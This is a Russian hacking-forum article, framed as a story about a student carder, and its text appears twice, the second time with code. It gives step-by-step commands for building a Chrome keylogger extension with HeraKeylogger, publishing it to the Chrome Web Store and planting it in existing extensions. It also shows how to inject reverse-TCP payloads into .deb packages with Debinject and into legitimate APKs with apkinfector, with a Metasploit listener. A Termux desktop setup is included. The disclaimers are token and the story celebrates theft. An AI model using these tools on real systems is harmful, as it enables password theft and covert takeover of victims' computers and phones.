Холод. Приглушенные звуки автострады, взор затуманен, размыт. Нечёткие мелкие фигурки, снующие в полумраке, под мостом: белые капюшоны, мантия, дающая слабый отблеск и так рецессивного света – всё поглощающая темень, тянущая мгновение, словно мальченок жевательную резинку, спокойствие, а фигурки всё кружатся быстрее и быстрее, непреодолимое желание уснуть.
Резко в поле взгляда попадает здоровяк , он прямо над тобой, медленно и уверенно заносит топор, дабы рубануть от души, делает это, как в сотни раз других, растягивая момент – удовольствие. Ты не можешь ничего сделать, лишь бегать глазками в поисках помощи – не сдвинуться. Здоровяк медленно опускает орудие, целясь тебе прямо в грудь, немыслимый ужас, сердце колотит, проламывая рёбра, на наружу выворачивая их, страх смерти, немыслимый, парализующий деймос … Рассвет, постель, одиночество, утро – всего лишь сон… Очередной сон.
Тяжесть в конечностях, ломота, головокружение, попытки дотронуться к лицу заканчивались пронзительной болью. Преодолевая себя, прилагая сверхчеловеческие усилия, Девин скачивается с постели на пол, пронзительный вопль и звук удара об пол смешиваются в симфоническую канонаду глухого и избавленного таланта директора музыкальной школы, страдающего психическими расстройствами. Стон, болезненный и долгий, очередная таблетка – спокойствие, блаженство, умиротворение.
Спустя несколько мгновений, теперь бодрый, мужчина , в возрасте около тридцати лет , подрывается с пола и направляется к выходу со своего номера, открыв дверь, во взор падает ему шагающий паренек: одет в серые джинсы, чёрный кофтан, кепка и наушники, через плече висит сумка для ноутбука. В спешке парень не обратил никакого внимания на человека, стоявшего у двери, а с кармана, быстро проходящего человечка, выпал стеклянный шарик. Выкотиться ему предстояло именно на перекрест путей Девина – глухой звук падения, удар – темнота.
Майкл даже не услышал этого, стараясь покинуть скорее здания и будучи в поднесенном к небесам настроении , ибо только что свершилась его мечта, он смог заработать на новую квартиру, обворовав несколько доверчивых особей в отеле, путем подмены точки доступа.
Приветствую, особо нет вариантов и идей , как теперь правильно начать первую строчку именно статьи , а не подводки, потому ограничимся таким вот выпадом приветствия вида. Как заметить вам удалось, статья уже концептуально иная, хотя будем беседовать о вещах приземлённых , но неординарно и в своей специфической манере изложения.
Собственно, знакомьтесь – это Майкл: типичный студент-иностранец , который проходит обучение в политехническом ВУЗе на втором курсе, специальность значения особого не играет, но важно определить себе ключи его психотипа - он любит всякие хацкерские примочки и штучки, потому постоянно носит с собой ноутбук. Основным его заработком есть кардинг, но он также увлечен в другие сферы чёрного пентеста, заядлый шутник и тролль, обладающий не последним интеллектом на дне современного общества.
А теперь к плану:
Первым счётом, обращу ваше внимание на надобность шапочки с фольги во время прочтения этого псевдошедевра. А делом ровным если, то я разочарован, ибо сколько бы я не предупреждал, не снимал с себя ответственность и не говорил, что не стоит использовать всё представленное в целях плохих – напрасно. Самые умные поймут и дойдут к выводам интуитивно, без моего словоблудия, а кто нет - растолкую в комментариях, больше нет слов – едем.
Разобравшись более детально в образе нашего главного героя, можно смекнуть, что для него есть очень важными следующие критерии во время его «пыльной работёнки»: простота, надёжность, относительная гарантия анонимности и безотказность. Даже осознавая всю опасность и возможное наказание, Майкл предпочитает действовать не так скрытно, как эффективно, потому всячески старается применить навыки игры в драматическом кружке, то бишь социальную инженерию.
Этого рода инструмент во взор Майки очень давно вошёл, словно соринка, превратившаяся в бревно торчащее с глаза. Прочитав описание данного скрипта наш персонаж приходит к выводам, что это обыкновенный кейлогер, который встраивается в браузер и выдаёт нам результат желанный для наживы – пароли. Потому без промедлений Майки копирует этот репозиторий с гитхаб следующей командой:
Затем переходит в директорию и устанавливает зависимости с помощью pip3 и запускает Геру в действие:
Поговаривают, что жена Зевса была очень и очень капризной, славно, что данный скрипт эта участь обошла, надеюсь, это не сделало его менее величественным.
После есть всё предельно простым – Майкл вводит айпи адрес свой, делает описание расширения и активирует PHP cлушатель. Следующим шагом нам стоит убедиться, что наше дополнение к браузеру действительно было скомпилировано: переходим в папочку с репозиторием, где отыскиваем следующий каталог, открыв его мы должны лицезреть три файла.
Дальше нам понадобится сам браузер для тестов, так как я работаю с под Kali, как и наш главный герой, придётся его установить, ибо дефолтно он отсутствует. Команды даю без особых разъяснений, поверьте на слово, что это работает:
Cледом открываем наш, уже установленный, хром и переходим во вкладку «дополнительно», а уже оттуда в «Расширения», но изначально мы увидим только стандартный список и никаких функций подгрузки чего-то своего, потому включаем режим разработчика, а это делается в левом верхнем углу, и довольствуемся прелестью возможностей.
Заметив вкладочку «Компиляция» , Майкл слегка задумался, но оставить решил на потом, нажимая на «Загрузить распакованное расширение», вслед за этим переходим в директорию с Герой и выбираем именно папку (Папку, да, не файлик, а целую папку), где был локализирован готовый кейлогер и тыкаем «Загрузить». Далее наблюдаем красивую картину с установленным расширением, но именно Майкл на этом не остановится – это дотошный и педантичный мальчишка, который никогда не останавливается не изучив вплоть и до конца, именно из-за этого он переходит на какой-то сайт и проходит авторизацию, спустя мгновение шагает в папку с репозиторием и открывает файл «logs.txt», где уже со спокойной душей видит пароль.
Но даже теперь ему мало и он хочет попытаться сжать расширение посредством функции браузера и попытаться отправить его в магазин хром, что и делает. Первым делом сжимает его, выбрав пункт «Сжать расширение», получив в итоге два файлика - ключ и собственно сам плагин. Затем ступает в раздел магазина «Developer Dashboard» и вносит одноразовую плату в 5 долларов за создания аккаунта разработчика, после успешно выгружает своё творение, то бишь дитё Геры, во свет.
А что если попытаться взять какое-то расширение, что уже имеется в сторе и вставить в исходный код его кейлогер? Для этого скачиваем любое, после распаковываем с помощью обычного архиватора, перейдя в папку видим несколько файлов, что отвечают за Javascript. А я ведь не кодер, как и Майкл ,потому вставляем код кейлогера везде в конец. После подгружаем в хром – пау, а логи приходят.
Мини-выводы
Как видите, к сожалению, перед таким даже самые топовые браузеры беззащитны, что достаточно странно, но самые большие разочарования, провалы, и дыры имеют вещи, обретавшие репутацию на протяжении веков. Со способов защиты ничего посоветовать не могу, разве вручную просматривать код и анализировать его составляющее на предмет вредоносных элементов.
И да, о подомном мы вели беседу в прошлой статье, но здесь дела обстоят иначе в корне, ибо прошлый скрипт, допустим Калимукс, создавал под себя отдельную файловую систему, внутри выделенного места под эмулятор при операциях с которой получал доступ суперпользователя, хотя концепт у них схож, это всё же кардинально разные приспособления, к делу непосредственно.
Для нашего Майки огромнейшим счёт нужны не столь умения, как портативность и чувство, когда нужно остановиться – меры датчик именно. Изначально нам было ведомо, что наш юный, но уже не зеленый хацкер, пользуется обычным ноутбуком с Кали, такой параметр был подобающим, но ведь если углубиться в психологию масс, то парень с ноутбуком привлекает больше внимания и вызывает более высокое количество подозрений, чем мальчишка с телефоном. К сути, то не всем ведомо, что с телефонов можно творить ужасти.
Не всегда представляется удобным помнить , что и какой командой нужно активировать, а GUI на базе самого термукса – дело другое. Потому наш Майки быстренько устанавливает весь нужный хлам для полноценной работы одной командой:
Следующим чередом стоит установить сам репозиторий, а после установки перейти в его папку, где скопировать файлы «Home» & «usr» и перенести их в корневую папку эмулятора термукс, но это удобней сделать командой, ибо возиться с файлами – это не комильфо для нашего студентика:
А теперь стоит настроить саму визуализацию, посредством старого-доброго VNC. Для начала запустим его и укажем пароль для подключения:
Следующим шагом стоит выбрать интерфейс рабочего стола, а затем и перезапустить сессию и включить заново:
А теперь переходим в VNCClient и указываем айпи локального хоста с портом 5901. Пау-пау.
Стоит сказать, что всё основано на одном и том же принципе, но имеет некоторые отличия в корне, этот вариант более простой и ,возможно даже, надёжней.
Так, как среда деятельности Майкла ограничена примитивностью и безотказностью, потому давайте рассмотрим способ подобающий роду занятий. Речь пойдёт о простой, как двери, полезной нагрузке, интегрированной в различные файлы. Такая вещица в умелых руках может приносить неплохой профит, если есть голова на плечах, как у нашего героя. (Здесь не спутайте, мы рассматриваем скрипты, я не призываю использовать это в целях фарма денег).
Майки очень заинтересовал тот факт, что ходит стереотип о том, что на платформы Линукс нет вирусов, а слегка подумав, то можно провести аналогию: если нет вирусов, то нет и средств защиты от них. Наш студентик очень заинтересовался файлом с расширением .deb, когда устанавливал Хром на свою машину, а что если интегрировать полезную нагрузку в него? Кажись никто не будет ожидать ,что в таком файлике могут быть какие-то зловреды, тем более это ведь линукс.
Хотя практического применения сыскать будет трудно, но ситуации разные бывают, для этого воспользуемся репозиторием под названием debinject, скопировав его:
Переходим в корневую папку с ним, куда вставляем заранее подготовленный файл с расширением .deb, после запускаем сам скрипт:
Указываем название скопированного файла, указываем наш порт и адрес, а после выбираем архитектуру. Майклу больше по душе реверс TPC, потому он кликает именно на него, следующим делом соглашается со всем и вся , следом может лицезреть картину запущенного слушателя.
Здесь я специально указал свой внешний адрес, дабы провести полноценный тест с вирутальной машиной на базе линукс. А именно AWS EC2 Ubuntu 20.4. Кое-как допёр, что нужно просто перетащить файл в окошко SSH клиента, а затем провёл аналогичные действия, как и с установщиком хрома, то есть банально установил – вуаля, открылась новая сессия.
А теперь давайте словим ностальгическую капельку ушедших годов, когда-то давно я писал статью о полезных нагрузках, где мы создавали APK файл с ним, пустой файл да, подписывали его и тестировали на различных машинах. А давайте-ка усовершенствуем этот метод, как раз и Майклу нравится, ибо сейчас все пользуются мобильными приложениями от банков, даже автор.
Специально для этого отрыл достаточно забавный скрипт, который вносит полезную нагрузку уже в существующий APK, а после интеграции и подписывает , указывая всю нужную информацию.
Существует отличительный нюанс, установку нужно проводить в следующей директории:
Затем проводим установку самого скрипта и побочных, что тоже будут нужны в ходе компиляции и подписи:
Теперь со спокойной совестью вставляем следующую команду, изменив название конечного файла и исходного , указав его путь:
Затем будет уйма всякой всячины , с которой нужно будет соглашаться и прописывать информацию, а в конце предстоит выбрать и приложение, которым будем производить подпись, ну, это предельно просто и смысла расписывать нет.
После завершения последней операции с подписью нам нужно перейти в корневую папку репозитория, где будет валяться наш готовый APK, вроде в папке «Final», пишу по памяти и не помню, но там будет указана директория аутпута, потому не беда.
Переходим непосредственно к тестам, для этого возьмём простенький девайс на Андроид 6.0, скидываем на него наш вирусный APK и проводим установку. Незначительным минусом может быть количество запрашиваемых разрешений, но это скрыть никак нельзя, правда обычно люди на это не смотрят.
После установки на телефоне ничего не изменилось, появилась игрушка, которая была выбрана в качестве оболочки, но ведь мы не запустили слушатель..
Да, моя оплошность, делается это с помощью метасплоита, в корневой папке будет файл с расширением .rb, который будет открыт через VIM, просто запускаете msfconsole и вставляете все команды – слушатель запущен. А теперь проводим повторную установку и можем лицезреть открытую сессию.
Теперь затронем тему интеграции полезной нагрузки в картинку, а почему бы и нет, след…
Сделав последний глоток с чашки и с трудом оторвав глаза от экрана, Вадим плавно прикрыл телефон подушкой, прежде занеся статью в закладки, чтобы дочитать с утра. Дабы не разбудить никого со спящих, бархатом уложился на подушку . Чай был на исходе и продолжать чтение смысла не имело, тянуло посетить Морфея , отведав его утехи по пути…
(Продолжение следует…)
Резко в поле взгляда попадает здоровяк , он прямо над тобой, медленно и уверенно заносит топор, дабы рубануть от души, делает это, как в сотни раз других, растягивая момент – удовольствие. Ты не можешь ничего сделать, лишь бегать глазками в поисках помощи – не сдвинуться. Здоровяк медленно опускает орудие, целясь тебе прямо в грудь, немыслимый ужас, сердце колотит, проламывая рёбра, на наружу выворачивая их, страх смерти, немыслимый, парализующий деймос … Рассвет, постель, одиночество, утро – всего лишь сон… Очередной сон.
Тяжесть в конечностях, ломота, головокружение, попытки дотронуться к лицу заканчивались пронзительной болью. Преодолевая себя, прилагая сверхчеловеческие усилия, Девин скачивается с постели на пол, пронзительный вопль и звук удара об пол смешиваются в симфоническую канонаду глухого и избавленного таланта директора музыкальной школы, страдающего психическими расстройствами. Стон, болезненный и долгий, очередная таблетка – спокойствие, блаженство, умиротворение.
Спустя несколько мгновений, теперь бодрый, мужчина , в возрасте около тридцати лет , подрывается с пола и направляется к выходу со своего номера, открыв дверь, во взор падает ему шагающий паренек: одет в серые джинсы, чёрный кофтан, кепка и наушники, через плече висит сумка для ноутбука. В спешке парень не обратил никакого внимания на человека, стоявшего у двери, а с кармана, быстро проходящего человечка, выпал стеклянный шарик. Выкотиться ему предстояло именно на перекрест путей Девина – глухой звук падения, удар – темнота.
Майкл даже не услышал этого, стараясь покинуть скорее здания и будучи в поднесенном к небесам настроении , ибо только что свершилась его мечта, он смог заработать на новую квартиру, обворовав несколько доверчивых особей в отеле, путем подмены точки доступа.
Заглавие
Приветствую, особо нет вариантов и идей , как теперь правильно начать первую строчку именно статьи , а не подводки, потому ограничимся таким вот выпадом приветствия вида. Как заметить вам удалось, статья уже концептуально иная, хотя будем беседовать о вещах приземлённых , но неординарно и в своей специфической манере изложения.
Собственно, знакомьтесь – это Майкл: типичный студент-иностранец , который проходит обучение в политехническом ВУЗе на втором курсе, специальность значения особого не играет, но важно определить себе ключи его психотипа - он любит всякие хацкерские примочки и штучки, потому постоянно носит с собой ноутбук. Основным его заработком есть кардинг, но он также увлечен в другие сферы чёрного пентеста, заядлый шутник и тролль, обладающий не последним интеллектом на дне современного общества.
А теперь к плану:
- Да приклонимся пред Царицей Богов: расширение-кейлогер для Chrome
- Визуал, как тип искусства: мобильно, практично, удобно
- Сказание о вездесущей полезной нагрузке: они уже в твоей голове
Берегись
Первым счётом, обращу ваше внимание на надобность шапочки с фольги во время прочтения этого псевдошедевра. А делом ровным если, то я разочарован, ибо сколько бы я не предупреждал, не снимал с себя ответственность и не говорил, что не стоит использовать всё представленное в целях плохих – напрасно. Самые умные поймут и дойдут к выводам интуитивно, без моего словоблудия, а кто нет - растолкую в комментариях, больше нет слов – едем.
Да приклонимся пред Царицей Богов: расширение-кейлогер для Chrome
Разобравшись более детально в образе нашего главного героя, можно смекнуть, что для него есть очень важными следующие критерии во время его «пыльной работёнки»: простота, надёжность, относительная гарантия анонимности и безотказность. Даже осознавая всю опасность и возможное наказание, Майкл предпочитает действовать не так скрытно, как эффективно, потому всячески старается применить навыки игры в драматическом кружке, то бишь социальную инженерию.
Этого рода инструмент во взор Майки очень давно вошёл, словно соринка, превратившаяся в бревно торчащее с глаза. Прочитав описание данного скрипта наш персонаж приходит к выводам, что это обыкновенный кейлогер, который встраивается в браузер и выдаёт нам результат желанный для наживы – пароли. Потому без промедлений Майки копирует этот репозиторий с гитхаб следующей командой:
Код:
git clone https://github.com/UndeadSec/HeraKeylogger.gitЗатем переходит в директорию и устанавливает зависимости с помощью pip3 и запускает Геру в действие:
Код:
cd HeraKeylogger
sudo apt-get install python3-pip -y
sudo pip3 install -r requirements.txt
python3 hera.pyПоговаривают, что жена Зевса была очень и очень капризной, славно, что данный скрипт эта участь обошла, надеюсь, это не сделало его менее величественным.
После есть всё предельно простым – Майкл вводит айпи адрес свой, делает описание расширения и активирует PHP cлушатель. Следующим шагом нам стоит убедиться, что наше дополнение к браузеру действительно было скомпилировано: переходим в папочку с репозиторием, где отыскиваем следующий каталог, открыв его мы должны лицезреть три файла.
Дальше нам понадобится сам браузер для тестов, так как я работаю с под Kali, как и наш главный герой, придётся его установить, ибо дефолтно он отсутствует. Команды даю без особых разъяснений, поверьте на слово, что это работает:
Код:
wget https://dl.google.com/linux/direct/google-chrome-stable_current_amd64.deb
apt install gdebi-core
gdebi google-chrome-stable_current_amd64.deb
google-chrome --no-sandboxCледом открываем наш, уже установленный, хром и переходим во вкладку «дополнительно», а уже оттуда в «Расширения», но изначально мы увидим только стандартный список и никаких функций подгрузки чего-то своего, потому включаем режим разработчика, а это делается в левом верхнем углу, и довольствуемся прелестью возможностей.
Заметив вкладочку «Компиляция» , Майкл слегка задумался, но оставить решил на потом, нажимая на «Загрузить распакованное расширение», вслед за этим переходим в директорию с Герой и выбираем именно папку (Папку, да, не файлик, а целую папку), где был локализирован готовый кейлогер и тыкаем «Загрузить». Далее наблюдаем красивую картину с установленным расширением, но именно Майкл на этом не остановится – это дотошный и педантичный мальчишка, который никогда не останавливается не изучив вплоть и до конца, именно из-за этого он переходит на какой-то сайт и проходит авторизацию, спустя мгновение шагает в папку с репозиторием и открывает файл «logs.txt», где уже со спокойной душей видит пароль.
Но даже теперь ему мало и он хочет попытаться сжать расширение посредством функции браузера и попытаться отправить его в магазин хром, что и делает. Первым делом сжимает его, выбрав пункт «Сжать расширение», получив в итоге два файлика - ключ и собственно сам плагин. Затем ступает в раздел магазина «Developer Dashboard» и вносит одноразовую плату в 5 долларов за создания аккаунта разработчика, после успешно выгружает своё творение, то бишь дитё Геры, во свет.
А что если попытаться взять какое-то расширение, что уже имеется в сторе и вставить в исходный код его кейлогер? Для этого скачиваем любое, после распаковываем с помощью обычного архиватора, перейдя в папку видим несколько файлов, что отвечают за Javascript. А я ведь не кодер, как и Майкл ,потому вставляем код кейлогера везде в конец. После подгружаем в хром – пау, а логи приходят.
Мини-выводы
Как видите, к сожалению, перед таким даже самые топовые браузеры беззащитны, что достаточно странно, но самые большие разочарования, провалы, и дыры имеют вещи, обретавшие репутацию на протяжении веков. Со способов защиты ничего посоветовать не могу, разве вручную просматривать код и анализировать его составляющее на предмет вредоносных элементов.
Визуал, как тип искусства: мобильно, практично, удобно
И да, о подомном мы вели беседу в прошлой статье, но здесь дела обстоят иначе в корне, ибо прошлый скрипт, допустим Калимукс, создавал под себя отдельную файловую систему, внутри выделенного места под эмулятор при операциях с которой получал доступ суперпользователя, хотя концепт у них схож, это всё же кардинально разные приспособления, к делу непосредственно.
Для нашего Майки огромнейшим счёт нужны не столь умения, как портативность и чувство, когда нужно остановиться – меры датчик именно. Изначально нам было ведомо, что наш юный, но уже не зеленый хацкер, пользуется обычным ноутбуком с Кали, такой параметр был подобающим, но ведь если углубиться в психологию масс, то парень с ноутбуком привлекает больше внимания и вызывает более высокое количество подозрений, чем мальчишка с телефоном. К сути, то не всем ведомо, что с телефонов можно творить ужасти.
Не всегда представляется удобным помнить , что и какой командой нужно активировать, а GUI на базе самого термукса – дело другое. Потому наш Майки быстренько устанавливает весь нужный хлам для полноценной работы одной командой:
Код:
pkg update && pkg upgrade && pkg install x11-repo && pkg install tigervnc openbox obconf xorg-xsetroot xcompmgr xterm polybar st libnl zsh geany pcmanfm rofi feh neofetch htop vim elinks mutt git wget curl xfce4-settingsСледующим чередом стоит установить сам репозиторий, а после установки перейти в его папку, где скопировать файлы «Home» & «usr» и перенести их в корневую папку эмулятора термукс, но это удобней сделать командой, ибо возиться с файлами – это не комильфо для нашего студентика:
Код:
cd $HOME && git clone https://github.com/adi1090x/termux-desktop
mv -f ./home /data/data/com.termux/files && mv -f ./usr /data/data/com.termux/filesА теперь стоит настроить саму визуализацию, посредством старого-доброго VNC. Для начала запустим его и укажем пароль для подключения:
Код:
vncserver -localhost
export DISPLAY=":1"Следующим шагом стоит выбрать интерфейс рабочего стола, а затем и перезапустить сессию и включить заново:
Код:
vncserver
vncserver -kill :1А теперь переходим в VNCClient и указываем айпи локального хоста с портом 5901. Пау-пау.
Стоит сказать, что всё основано на одном и том же принципе, но имеет некоторые отличия в корне, этот вариант более простой и ,возможно даже, надёжней.
Сказание о вездесущей полезной нагрузке: они уже в твоей голове
Так, как среда деятельности Майкла ограничена примитивностью и безотказностью, потому давайте рассмотрим способ подобающий роду занятий. Речь пойдёт о простой, как двери, полезной нагрузке, интегрированной в различные файлы. Такая вещица в умелых руках может приносить неплохой профит, если есть голова на плечах, как у нашего героя. (Здесь не спутайте, мы рассматриваем скрипты, я не призываю использовать это в целях фарма денег).
Майки очень заинтересовал тот факт, что ходит стереотип о том, что на платформы Линукс нет вирусов, а слегка подумав, то можно провести аналогию: если нет вирусов, то нет и средств защиты от них. Наш студентик очень заинтересовался файлом с расширением .deb, когда устанавливал Хром на свою машину, а что если интегрировать полезную нагрузку в него? Кажись никто не будет ожидать ,что в таком файлике могут быть какие-то зловреды, тем более это ведь линукс.
Хотя практического применения сыскать будет трудно, но ситуации разные бывают, для этого воспользуемся репозиторием под названием debinject, скопировав его:
Код:
git clone https://github.com/UndeadSec/Debinject.gitПереходим в корневую папку с ним, куда вставляем заранее подготовленный файл с расширением .deb, после запускаем сам скрипт:
Код:
cd Debinject
python debinject.pyУказываем название скопированного файла, указываем наш порт и адрес, а после выбираем архитектуру. Майклу больше по душе реверс TPC, потому он кликает именно на него, следующим делом соглашается со всем и вся , следом может лицезреть картину запущенного слушателя.
Здесь я специально указал свой внешний адрес, дабы провести полноценный тест с вирутальной машиной на базе линукс. А именно AWS EC2 Ubuntu 20.4. Кое-как допёр, что нужно просто перетащить файл в окошко SSH клиента, а затем провёл аналогичные действия, как и с установщиком хрома, то есть банально установил – вуаля, открылась новая сессия.
А теперь давайте словим ностальгическую капельку ушедших годов, когда-то давно я писал статью о полезных нагрузках, где мы создавали APK файл с ним, пустой файл да, подписывали его и тестировали на различных машинах. А давайте-ка усовершенствуем этот метод, как раз и Майклу нравится, ибо сейчас все пользуются мобильными приложениями от банков, даже автор.
Специально для этого отрыл достаточно забавный скрипт, который вносит полезную нагрузку уже в существующий APK, а после интеграции и подписывает , указывая всю нужную информацию.
Существует отличительный нюанс, установку нужно проводить в следующей директории:
Код:
cd /opt/Затем проводим установку самого скрипта и побочных, что тоже будут нужны в ходе компиляции и подписи:
Код:
git clone https://github.com/Technowlogy-Pushpender/apkinfector.git
cd apkinfector
apt-get update && apt-get install apktool && apt-get install zipalign && apt-get install apksigner
python3 infector.py --helpТеперь со спокойной совестью вставляем следующую команду, изменив название конечного файла и исходного , указав его путь:
Код:
python3 infector.py --lhost 192.168.43.70 --lport 4444 --apk-name NEW_APK_NAME --normal-apk /root/Desktop/Path/TO/Legitemate_APK_File.apkЗатем будет уйма всякой всячины , с которой нужно будет соглашаться и прописывать информацию, а в конце предстоит выбрать и приложение, которым будем производить подпись, ну, это предельно просто и смысла расписывать нет.
После завершения последней операции с подписью нам нужно перейти в корневую папку репозитория, где будет валяться наш готовый APK, вроде в папке «Final», пишу по памяти и не помню, но там будет указана директория аутпута, потому не беда.
Переходим непосредственно к тестам, для этого возьмём простенький девайс на Андроид 6.0, скидываем на него наш вирусный APK и проводим установку. Незначительным минусом может быть количество запрашиваемых разрешений, но это скрыть никак нельзя, правда обычно люди на это не смотрят.
После установки на телефоне ничего не изменилось, появилась игрушка, которая была выбрана в качестве оболочки, но ведь мы не запустили слушатель..
Да, моя оплошность, делается это с помощью метасплоита, в корневой папке будет файл с расширением .rb, который будет открыт через VIM, просто запускаете msfconsole и вставляете все команды – слушатель запущен. А теперь проводим повторную установку и можем лицезреть открытую сессию.
Теперь затронем тему интеграции полезной нагрузки в картинку, а почему бы и нет, след…
Сделав последний глоток с чашки и с трудом оторвав глаза от экрана, Вадим плавно прикрыл телефон подушкой, прежде занеся статью в закладки, чтобы дочитать с утра. Дабы не разбудить никого со спящих, бархатом уложился на подушку . Чай был на исходе и продолжать чтение смысла не имело, тянуло посетить Морфея , отведав его утехи по пути…
(Продолжение следует…)
